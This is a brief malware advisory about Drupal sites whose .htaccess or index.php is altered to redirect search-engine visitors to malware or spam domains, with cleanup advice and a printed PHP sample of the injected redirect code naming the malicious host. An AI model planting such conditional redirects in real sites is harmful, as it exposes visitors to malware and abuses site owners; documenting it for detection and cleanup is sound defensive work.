Description:
This attack uses .htaccess to redirect users to a site serving malware (or spam). In some times a PHP code is added to the index.php to do the redirection instead.
Loads malware from:
http://alolipololi.osa.pl
http://drivegup.tk
And other domains.
Affecting:
Drupal sites.
Clean up and details
Remove offending code from .htaccess and index.php.
Links:
http://blog.sucuri.net/2010/04/conditional-redirects-or-the-htaccess-malware.html
Malware sample:
.. error_reporting(0); $nccv=headers_sent(); if (!$nccv){ $referer=$_SERVER['HTTP_REFERER']; $ua=$_SERVER['HTTP_USER_AGENT']; if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing")) { if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl")){ header("Location: http://alolipololi.osa.pl/"); }